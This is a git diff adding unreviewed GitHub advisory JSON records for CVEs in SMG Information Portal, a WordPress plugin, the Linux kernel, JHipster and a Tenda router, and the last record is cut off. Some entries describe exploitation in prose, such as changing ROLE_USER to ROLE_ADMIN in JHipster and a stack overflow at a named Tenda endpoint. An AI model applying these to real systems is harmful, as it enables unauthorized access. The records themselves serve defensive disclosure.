b/advisories/unreviewed/2025/07/GHSA-c7xc-fv22-2pq3/GHSA-c7xc-fv22-2pq3.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c7xc-fv22-2pq3", + "modified": "2025-07-25T15:30:45Z", + "published": "2025-07-25T15:30:45Z", + "aliases": [ + "CVE-2025-5243" + ], + "details": "Unrestricted Upload of File with Dangerous Type, Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability in SMG Software Information Portal allows Code Injection, Upload a Web Shell to a Web Server, Code Inclusion.This issue affects Information Portal: before 13.06.2025.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5243" + }, + { + "type": "WEB", + "url": "https://www.usom.gov.tr/bildirim/tr-25-0174" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T13:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-cfcc-w9g2-336j/GHSA-cfcc-w9g2-336j.json b/advisories/unreviewed/2025/07/GHSA-cfcc-w9g2-336j/GHSA-cfcc-w9g2-336j.json new file mode 100644 index 0000000000000..5e59f949c7732 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-cfcc-w9g2-336j/GHSA-cfcc-w9g2-336j.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cfcc-w9g2-336j", + "modified": "2025-07-25T15:30:43Z", + "published": "2025-07-25T15:30:43Z", + "aliases": [ + "CVE-2025-3669" + ], + "details": "The Supreme Addons for Beaver Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's auto_qrcodesabb shortcode in all versions up to, and including, 1.0.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3669" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/supreme-addons-for-beaver-builder-lite/tags/1.0.9/modules/QR-Code/QR-Code.php#L102" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/supreme-addons-for-beaver-builder-lite/#developers" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/904ba3ec-efde-424c-a50b-2ce71ad91ca5?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T10:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-cfr6-wmxx-cfg2/GHSA-cfr6-wmxx-cfg2.json b/advisories/unreviewed/2025/07/GHSA-cfr6-wmxx-cfg2/GHSA-cfr6-wmxx-cfg2.json new file mode 100644 index 0000000000000..dcb8a29b940c6 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-cfr6-wmxx-cfg2/GHSA-cfr6-wmxx-cfg2.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cfr6-wmxx-cfg2", + "modified": "2025-07-25T15:30:51Z", + "published": "2025-07-25T15:30:51Z", + "aliases": [ + "CVE-2025-38371" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/v3d: Disable interrupts before resetting the GPU\n\nCurrently, an interrupt can be triggered during a GPU reset, which can\nlead to GPU hangs and NULL pointer dereference in an interrupt context\nas shown in the following trace:\n\n [ 314.035040] Unable to handle kernel NULL pointer dereference at virtual address 00000000000000c0\n [ 314.043822] Mem abort info:\n [ 314.046606] ESR = 0x0000000096000005\n [ 314.050347] EC = 0x25: DABT (current EL), IL = 32 bits\n [ 314.055651] SET = 0, FnV = 0\n [ 314.058695] EA = 0, S1PTW = 0\n [ 314.061826] FSC = 0x05: level 1 translation fault\n [ 314.066694] Data abort info:\n [ 314.069564] ISV = 0, ISS = 0x00000005, ISS2 = 0x00000000\n [ 314.075039] CM = 0, WnR = 0, TnD = 0, TagAccess = 0\n [ 314.080080] GCS = 0, Overlay = 0, DirtyBit = 0, Xs = 0\n [ 314.085382] user pgtable: 4k pages, 39-bit VAs, pgdp=0000000102728000\n [ 314.091814] [00000000000000c0] pgd=0000000000000000, p4d=0000000000000000, pud=0000000000000000\n [ 314.100511] Internal error: Oops: 0000000096000005 [#1] PREEMPT SMP\n [ 314.106770] Modules linked in: v3d i2c_brcmstb vc4 snd_soc_hdmi_codec gpu_sched drm_shmem_helper drm_display_helper cec drm_dma_helper drm_kms_helper drm drm_panel_orientation_quirks snd_soc_core snd_compress snd_pcm_dmaengine snd_pcm snd_timer snd backlight\n [ 314.129654] CPU: 0 UID: 0 PID: 0 Comm: swapper/0 Not tainted 6.12.25+rpt-rpi-v8 #1 Debian 1:6.12.25-1+rpt1\n [ 314.139388] Hardware name: Raspberry Pi 4 Model B Rev 1.4 (DT)\n [ 314.145211] pstate: 600000c5 (nZCv daIF -PAN -UAO -TCO -DIT -SSBS BTYPE=--)\n [ 314.152165] pc : v3d_irq+0xec/0x2e0 [v3d]\n [ 314.156187] lr : v3d_irq+0xe0/0x2e0 [v3d]\n [ 314.160198] sp : ffffffc080003ea0\n [ 314.163502] x29: ffffffc080003ea0 x28: ffffffec1f184980 x27: 021202b000000000\n [ 314.170633] x26: ffffffec1f17f630 x25: ffffff8101372000 x24: ffffffec1f17d9f0\n [ 314.177764] x23: 000000000000002a x22: 000000000000002a x21: ffffff8103252000\n [ 314.184895] x20: 0000000000000001 x19: 00000000deadbeef x18: 0000000000000000\n [ 314.192026] x17: ffffff94e51d2000 x16: ffffffec1dac3cb0 x15: c306000000000000\n [ 314.199156] x14: 0000000000000000 x13: b2fc982e03cc5168 x12: 0000000000000001\n [ 314.206286] x11: ffffff8103f8bcc0 x10: ffffffec1f196868 x9 : ffffffec1dac3874\n [ 314.213416] x8 : 0000000000000000 x7 : 0000000000042a3a x6 : ffffff810017a180\n [ 314.220547] x5 : ffffffec1ebad400 x4 : ffffffec1ebad320 x3 : 00000000000bebeb\n [ 314.227677] x2 : 0000000000000000 x1 : 0000000000000000 x0 : 0000000000000000\n [ 314.234807] Call trace:\n [ 314.237243] v3d_irq+0xec/0x2e0 [v3d]\n [ 314.240906] __handle_irq_event_percpu+0x58/0x218\n [ 314.245609] handle_irq_event+0x54/0xb8\n [ 314.249439] handle_fasteoi_irq+0xac/0x240\n [ 314.253527] handle_irq_desc+0x48/0x68\n [ 314.257269] generic_handle_domain_irq+0x24/0x38\n [ 314.261879] gic_handle_irq+0x48/0xd8\n [ 314.265533] call_on_irq_stack+0x24/0x58\n [ 314.269448] do_interrupt_handler+0x88/0x98\n [ 314.273624] el1_interrupt+0x34/0x68\n [ 314.277193] el1h_64_irq_handler+0x18/0x28\n [ 314.281281] el1h_64_irq+0x64/0x68\n [ 314.284673] default_idle_call+0x3c/0x168\n [ 314.288675] do_idle+0x1fc/0x230\n [ 314.291895] cpu_startup_entry+0x3c/0x50\n [ 314.295810] rest_init+0xe4/0xf0\n [ 314.299030] start_kernel+0x5e8/0x790\n [ 314.302684] __primary_switched+0x80/0x90\n [ 314.306691] Code: 940029eb 360ffc13 f9442ea0 52800001 (f9406017)\n [ 314.312775] ---[ end trace 0000000000000000 ]---\n [ 314.317384] Kernel panic - not syncing: Oops: Fatal exception in interrupt\n [ 314.324249] SMP: stopping secondary CPUs\n [ 314.328167] Kernel Offset: 0x2b9da00000 from 0xffffffc080000000\n [ 314.334076] PHYS_OFFSET: 0x0\n [ 314.336946] CPU features: 0x08,00002013,c0200000,0200421b\n [ 314.342337] Memory Limit: none\n [ 314.345382] ---[ end Kernel panic - not syncing: Oops: Fatal exception in interrupt ]---\n\nBefore resetting the G\n---truncated---", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38371" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/226862f50a7a88e4e4de9abbf36c64d19acd6fd0" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2446e25e9246e0642a41d91cbf54c33b275da3c3" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/387da3b6d1a90e3210bc9a7fb56703bdad2ac18a" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/576a6739e08ac06c67f2916f71204557232388b0" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/9ff95ed0371aec4d9617e478e9c69cde86cd7c38" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b9c403d1236cecb10dd0246a30d81e4b265f8e8d" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c8851a6ab19d9f390677c42a3cc01ff9b2eb6241" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/dc805c927cd832bb8f790b756880ae6c769d5fbc" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-cfvr-4cm5-x2r3/GHSA-cfvr-4cm5-x2r3.json b/advisories/unreviewed/2025/07/GHSA-cfvr-4cm5-x2r3/GHSA-cfvr-4cm5-x2r3.json new file mode 100644 index 0000000000000..6bcc0cec8ad84 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-cfvr-4cm5-x2r3/GHSA-cfvr-4cm5-x2r3.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cfvr-4cm5-x2r3", + "modified": "2025-07-25T15:30:52Z", + "published": "2025-07-25T15:30:52Z", + "aliases": [ + "CVE-2025-38397" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-multipath: fix suspicious RCU usage warning\n\nWhen I run the NVME over TCP test in virtme-ng, I get the following\n\"suspicious RCU usage\" warning in nvme_mpath_add_sysfs_link():\n\n'''\n[ 5.024557][ T44] nvmet: Created nvm controller 1 for subsystem nqn.2025-06.org.nvmexpress.mptcp for NQN nqn.2014-08.org.nvmexpress:uuid:f7f6b5e0-ff97-4894-98ac-c85309e0bc77.\n[ 5.027401][ T183] nvme nvme0: creating 2 I/O queues.\n[ 5.029017][ T183] nvme nvme0: mapped 2/0/0 default/read/poll queues.\n[ 5.032587][ T183] nvme nvme0: new ctrl: NQN \"nqn.2025-06.org.nvmexpress.mptcp\", addr 127.0.0.1:4420, hostnqn: nqn.2014-08.org.nvmexpress:uuid:f7f6b5e0-ff97-4894-98ac-c85309e0bc77\n[ 5.042214][ T25]\n[ 5.042440][ T25] =============================\n[ 5.042579][ T25] WARNING: suspicious RCU usage\n[ 5.042705][ T25] 6.16.0-rc3+ #23 Not tainted\n[ 5.042812][ T25] -----------------------------\n[ 5.042934][ T25] drivers/nvme/host/multipath.c:1203 RCU-list traversed in non-reader section!!\n[ 5.043111][ T25]\n[ 5.043111][ T25] other info that might help us debug this:\n[ 5.043111][ T25]\n[ 5.043341][ T25]\n[ 5.043341][ T25] rcu_scheduler_active = 2, debug_locks = 1\n[ 5.043502][ T25] 3 locks held by kworker/u9:0/25:\n[ 5.043615][ T25] #0: ffff888008730948 ((wq_completion)async){+.+.}-{0:0}, at: process_one_work+0x7ed/0x1350\n[ 5.043830][ T25] #1: ffffc900001afd40 ((work_completion)(&entry->work)){+.+.}-{0:0}, at: process_one_work+0xcf3/0x1350\n[ 5.044084][ T25] #2: ffff888013ee0020 (&head->srcu){.+.+}-{0:0}, at: nvme_mpath_add_sysfs_link.part.0+0xb4/0x3a0\n[ 5.044300][ T25]\n[ 5.044300][ T25] stack backtrace:\n[ 5.044439][ T25] CPU: 0 UID: 0 PID: 25 Comm: kworker/u9:0 Not tainted 6.16.0-rc3+ #23 PREEMPT(full)\n[ 5.044441][ T25] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011\n[ 5.044442][ T25] Workqueue: async async_run_entry_fn\n[ 5.044445][ T25] Call Trace:\n[ 5.044446][ T25] \n[ 5.044449][ T25] dump_stack_lvl+0x6f/0xb0\n[ 5.044453][ T25] lockdep_rcu_suspicious.cold+0x4f/0xb1\n[ 5.044457][ T25] nvme_mpath_add_sysfs_link.part.0+0x2fb/0x3a0\n[ 5.044459][ T25] ? queue_work_on+0x90/0xf0\n[ 5.044461][ T25] ? lockdep_hardirqs_on+0x78/0x110\n[ 5.044466][ T25] nvme_mpath_set_live+0x1e9/0x4f0\n[ 5.044470][ T25] nvme_mpath_add_disk+0x240/0x2f0\n[ 5.044472][ T25] ? __pfx_nvme_mpath_add_disk+0x10/0x10\n[ 5.044475][ T25] ? add_disk_fwnode+0x361/0x580\n[ 5.044480][ T25] nvme_alloc_ns+0x81c/0x17c0\n[ 5.044483][ T25] ? kasan_quarantine_put+0x104/0x240\n[ 5.044487][ T25] ? __pfx_nvme_alloc_ns+0x10/0x10\n[ 5.044495][ T25] ? __pfx_nvme_find_get_ns+0x10/0x10\n[ 5.044496][ T25] ? rcu_read_lock_any_held+0x45/0xa0\n[ 5.044498][ T25] ? validate_chain+0x232/0x4f0\n[ 5.044503][ T25] nvme_scan_ns+0x4c8/0x810\n[ 5.044506][ T25] ? __pfx_nvme_scan_ns+0x10/0x10\n[ 5.044508][ T25] ? find_held_lock+0x2b/0x80\n[ 5.044512][ T25] ? ktime_get+0x16d/0x220\n[ 5.044517][ T25] ? kvm_clock_get_cycles+0x18/0x30\n[ 5.044520][ T25] ? __pfx_nvme_scan_ns_async+0x10/0x10\n[ 5.044522][ T25] async_run_entry_fn+0x97/0x560\n[ 5.044523][ T25] ? rcu_is_watching+0x12/0xc0\n[ 5.044526][ T25] process_one_work+0xd3c/0x1350\n[ 5.044532][ T25] ? __pfx_process_one_work+0x10/0x10\n[ 5.044536][ T25] ? assign_work+0x16c/0x240\n[ 5.044539][ T25] worker_thread+0x4da/0xd50\n[ 5.044545][ T25] ? __pfx_worker_thread+0x10/0x10\n[ 5.044546][ T25] kthread+0x356/0x5c0\n[ 5.044548][ T25] ? __pfx_kthread+0x10/0x10\n[ 5.044549][ T25] ? ret_from_fork+0x1b/0x2e0\n[ 5.044552][ T25] ? __lock_release.isra.0+0x5d/0x180\n[ 5.044553][ T25] ? ret_from_fork+0x1b/0x2e0\n[ 5.044555][ T25] ? rcu_is_watching+0x12/0xc0\n[ 5.044557][ T25] ? __pfx_kthread+0x10/0x10\n[ 5.04\n---truncated---", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38397" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a432383e6cd86d9fda00a6073ed35c1067a836d6" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d6811074203b13f715ce2480ac64c5b1c773f2a5" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-ch6p-gm8m-r8fm/GHSA-ch6p-gm8m-r8fm.json b/advisories/unreviewed/2025/07/GHSA-ch6p-gm8m-r8fm/GHSA-ch6p-gm8m-r8fm.json new file mode 100644 index 0000000000000..70f74e51f9af1 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-ch6p-gm8m-r8fm/GHSA-ch6p-gm8m-r8fm.json @@ -0,0 +1,57 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ch6p-gm8m-r8fm", + "modified": "2025-07-25T15:30:53Z", + "published": "2025-07-25T15:30:53Z", + "aliases": [ + "CVE-2025-38400" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nnfs: Clean up /proc/net/rpc/nfs when nfs_fs_proc_net_init() fails.\n\nsyzbot reported a warning below [1] following a fault injection in\nnfs_fs_proc_net_init(). [0]\n\nWhen nfs_fs_proc_net_init() fails, /proc/net/rpc/nfs is not removed.\n\nLater, rpc_proc_exit() tries to remove /proc/net/rpc, and the warning\nis logged as the directory is not empty.\n\nLet's handle the error of nfs_fs_proc_net_init() properly.\n\n[0]:\nFAULT_INJECTION: forcing a failure.\nname failslab, interval 1, probability 0, space 0, times 0\nCPU: 1 UID: 0 PID: 6120 Comm: syz.2.27 Not tainted 6.16.0-rc1-syzkaller-00010-g2c4a1f3fe03e #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 05/07/2025\nCall Trace:\n \n dump_stack_lvl (lib/dump_stack.c:123)\n should_fail_ex (lib/fault-inject.c:73 lib/fault-inject.c:174)\n should_failslab (mm/failslab.c:46)\n kmem_cache_alloc_noprof (mm/slub.c:4178 mm/slub.c:4204)\n __proc_create (fs/proc/generic.c:427)\n proc_create_reg (fs/proc/generic.c:554)\n proc_create_net_data (fs/proc/proc_net.c:120)\n nfs_fs_proc_net_init (fs/nfs/client.c:1409)\n nfs_net_init (fs/nfs/inode.c:2600)\n ops_init (net/core/net_namespace.c:138)\n setup_net (net/core/net_namespace.c:443)\n copy_net_ns (net/core/net_namespace.c:576)\n create_new_namespaces (kernel/nsproxy.c:110)\n unshare_nsproxy_namespaces (kernel/nsproxy.c:218 (discriminator 4))\n ksys_unshare (kernel/fork.c:3123)\n __x64_sys_unshare (kernel/fork.c:3190)\n do_syscall_64 (arch/x86/entry/syscall_64.c:63 arch/x86/entry/syscall_64.c:94)\n entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)\n \n\n[1]:\nremove_proc_entry: removing non-empty directory 'net/rpc', leaking at least 'nfs'\n WARNING: CPU: 1 PID: 6120 at fs/proc/generic.c:727 remove_proc_entry+0x45e/0x530 fs/proc/generic.c:727\nModules linked in:\nCPU: 1 UID: 0 PID: 6120 Comm: syz.2.27 Not tainted 6.16.0-rc1-syzkaller-00010-g2c4a1f3fe03e #0 PREEMPT(full)\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 05/07/2025\n RIP: 0010:remove_proc_entry+0x45e/0x530 fs/proc/generic.c:727\nCode: 3c 02 00 0f 85 85 00 00 00 48 8b 93 d8 00 00 00 4d 89 f0 4c 89 e9 48 c7 c6 40 ba a2 8b 48 c7 c7 60 b9 a2 8b e8 33 81 1d ff 90 <0f> 0b 90 90 e9 5f fe ff ff e8 04 69 5e ff 90 48 b8 00 00 00 00 00\nRSP: 0018:ffffc90003637b08 EFLAGS: 00010282\nRAX: 0000000000000000 RBX: ffff88805f534140 RCX: ffffffff817a92c8\nRDX: ffff88807da99e00 RSI: ffffffff817a92d5 RDI: 0000000000000001\nRBP: ffff888033431ac0 R08: 0000000000000001 R09: 0000000000000000\nR10: 0000000000000001 R11: 0000000000000001 R12: ffff888033431a00\nR13: ffff888033431ae4 R14: ffff888033184724 R15: dffffc0000000000\nFS: 0000555580328500(0000) GS:ffff888124a62000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00007f71733743e0 CR3: 000000007f618000 CR4: 00000000003526f0\nDR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\nDR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\nCall Trace:\n \n sunrpc_exit_net+0x46/0x90 net/sunrpc/sunrpc_syms.c:76\n ops_exit_list net/core/net_namespace.c:200 [inline]\n ops_undo_list+0x2eb/0xab0 net/core/net_namespace.c:253\n setup_net+0x2e1/0x510 net/core/net_namespace.c:457\n copy_net_ns+0x2a6/0x5f0 net/core/net_namespace.c:574\n create_new_namespaces+0x3ea/0xa90 kernel/nsproxy.c:110\n unshare_nsproxy_namespaces+0xc0/0x1f0 kernel/nsproxy.c:218\n ksys_unshare+0x45b/0xa40 kernel/fork.c:3121\n __do_sys_unshare kernel/fork.c:3192 [inline]\n __se_sys_unshare kernel/fork.c:3190 [inline]\n __x64_sys_unshare+0x31/0x40 kernel/fork.c:3190\n do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline]\n do_syscall_64+0xcd/0x490 arch/x86/entry/syscall_64.c:94\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\nRIP: 0033:0x7fa1a6b8e929\nCode: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c\n---truncated---", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-38400" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/3c94212b57bedec3a386ef3da1ef00602f5c3d1d" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/412534a1fb76958b88dca48360c6f3ad4f3390f4" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/6acf340f8c1d296bcf535986175f5d0d6f2aab09" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/7701c245ff1ac1a126bf431e72b24547519046ff" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/8785701fd7cd52ae74c0d2b35b82568df74e9dbb" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b92397ce96743e4cc090207e2df2a856cb4cef08" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d0877c479f44fe475f4c8c02c88ce9ad43e90298" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e8d6f3ab59468e230f3253efe5cb63efa35289f7" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-cmm8-gw4m-26cw/GHSA-cmm8-gw4m-26cw.json b/advisories/unreviewed/2025/07/GHSA-cmm8-gw4m-26cw/GHSA-cmm8-gw4m-26cw.json new file mode 100644 index 0000000000000..d9e8c29a2c586 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-cmm8-gw4m-26cw/GHSA-cmm8-gw4m-26cw.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cmm8-gw4m-26cw", + "modified": "2025-07-25T15:30:53Z", + "published": "2025-07-25T15:30:53Z", + "aliases": [ + "CVE-2025-43712" + ], + "details": "JHipster before v.8.9.0 allows privilege escalation via a modified authorities parameter. Upon registering in the JHipster portal and logging in as a standard user, the authorities parameter in the response from the api/account endpoint contains the value ROLE_USER. By manipulating the authorities parameter and changing its value to ROLE_ADMIN, the privilege is successfully escalated to an Admin level. This allowed the access to all admin-related functionalities in the application.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-43712" + }, + { + "type": "WEB", + "url": "https://github.com/jhipster/generator-jhipster/releases" + }, + { + "type": "WEB", + "url": "https://medium.com/@hritikgodara/cve-2025-43712-privilege-escalation-via-response-manipulation-in-the-jhipster-platform-5e18c0434def" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-25T13:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-crh2-v64q-fq49/GHSA-crh2-v64q-fq49.json b/advisories/unreviewed/2025/07/GHSA-crh2-v64q-fq49/GHSA-crh2-v64q-fq49.json new file mode 100644 index 0000000000000..0b793b88d576a --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-crh2-v64q-fq49/GHSA-crh2-v64q-fq49.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-crh2-v64q-fq49", + "modified": "2025-07-25T15:30:45Z", + "published": "2025-07-25T15:30:45Z", + "aliases": [ + "CVE-2025-51087" + ], + "details": "Tenda AC8V4 V16.03.34.06` was discovered to contain stack overflow at /goform/saveParentControlInfo. The manipulation of the argument time leads to stack-based buffer overflow.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-51087" + }, + { + "type": "WEB", + "url": "https://github.com/TL-SN/IOT/blob/main/Tenda/Tenda-AC8v4%20%20V16.03.34.06/CVE-2025-51087.md" + }, + { + "type": "WEB", + "url": "http://tenda.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-24T15:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-cv9m-prxm-594h/GHSA-cv9m-prxm-594h.json b/advisories/unreviewed/2025/07/GHSA-cv9m-prxm-594h/GHSA-cv9m-prxm-594h.json new file mode 100644 index 0000000000000..5984b3c18b672 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-cv9m-prxm-594h/GHSA-cv9m-prxm-594h.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cv9m-prxm-594h", + "modified": "2025-07-25T15:30:51Z", + "published": "2025-07-25T15:30:51Z", + "aliases": [ + "CVE-2025-38358" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix race between async reclaim worker and close_ctree()\n\nSyzbot reported an assertion failure due to an attempt to add a delayed\niput after we have set BTRFS_FS_STATE_NO_DELAYED_IPUT in the fs_info\nstate:\n\n WARNING: CPU: 0 PID: 65 at fs/btrfs/inode.c:3420 btrfs_add_delayed_iput+0x2f8/0x370 fs/btrfs/inode.c:3420\n Modules linked in:\n CPU: 0 UID: 0 PID: 65 Comm: kworker/u8:4 Not tainted 6.15.0-next-20250530-syzkaller #0 PREEMPT(full)\n Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 05/07/2025\n Workqueue: btrfs-endio-write btrfs_work_helper\n RIP: 0010:btrfs_add_delayed_iput+0x2f8/0x370 fs/btrfs/inode.c:3420\n Code: 4e ad 5d (...)\n RSP: 0018:ffffc9000213f780 EFLAGS: 00010293\n RAX: ffffffff83c635b7 RBX: ffff888058920000 RCX: ffff88801c769e00\n RDX: 0000000000000000 RSI: 0000000000000100 RDI: 0000000000000000\n RBP: 0000000000000001 R08: ffff888058921b67 R09: 1ffff1100b12436c\n R10: dffffc0000000000 R11: ffffed100b12436d R12: 0000000000000001\n R13: dffffc0000000000 R14: ffff88807d748000 R15: 0000000000000100\n FS: 0000000000000000(0000) GS:ffff888125c53000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 00002000000bd038 CR3: 000000006a142000 CR4: 00000000003526f0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n Call Trace:\n \n btrfs_put_ordered_extent+0x19f/0x470 fs/btrfs/ordered-data.c:635\n btrfs_finish_one_ordered+0x11d8/0x1b10 fs/btrfs/inode.c:3312\n btrfs_work_helper+0x399/0xc20 fs/btrfs/async-thread.c:312\n process_one_work kernel/workqueue.c:3238 [inline]\n process_scheduled_works+0xae1/0x17b0 kernel/workqueue.c:3321\n worker_thread+0x8a0/0xda0 kernel/workqueue.c:3402\n kthread+0x70e/0x8a0 kernel/kthread.c:464\n ret_from_fork+0x3fc/0x770 arch/x86/kernel/process.c:148\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245\n \n\nThis can happen due to a race with the async reclaim worker like this:\n\n1) The async metadata reclaim worker enters shrink_delalloc(), which calls\n btrfs_start_delalloc_roots() with an nr_pages argument that has a value\n less than LONG_MAX, and that in turn enters start_delalloc_inodes(),\n which sets the local variable 'full_flush' to false because\n wbc->nr_to_write is less than LONG_MAX;\n\n2) There it finds inode X in a root's delalloc list, grabs a reference for\n inode X (with igrab()), and triggers writeback for it with\n filemap_fdatawrite_wbc(), which creates an ordered extent for inode X;\n\n3) The unmount sequence starts from another task, we enter close_ctree()\n and we flush the workqueue fs_info->endio_write_workers, which waits\n for the ordered extent for inode X to complete and when dropping the\n last reference of the ordered extent, with btrfs_put_ordered_extent(),\n when we call btrfs_add_delayed_iput() we don't add the inode to the\n list of delayed iputs because it has a refcount of 2, so we decrement\n it to 1 and return;\n\n4) Shortly after at close_ctree() we call btrfs_run_delayed_iputs() which\n runs all delayed iputs, and then we set BTRFS_FS_STATE_NO_DELAYED_IPUT\n in the fs_info state;\n\n5) The async reclaim worker, after calling filemap_fdatawrite_wbc(), now\n calls btrfs_add_delayed_iput() for inode X and there we trigger an\n assertion failure since the fs_info state has the flag\n BTRFS_FS_STATE_NO_DELAYED_IPUT set.\n\nFix this by setting BTRFS_FS_STATE_NO_DELAYED_IPUT only after we wait for\nthe async reclaim workers to finish, after we call cancel_work_sync() 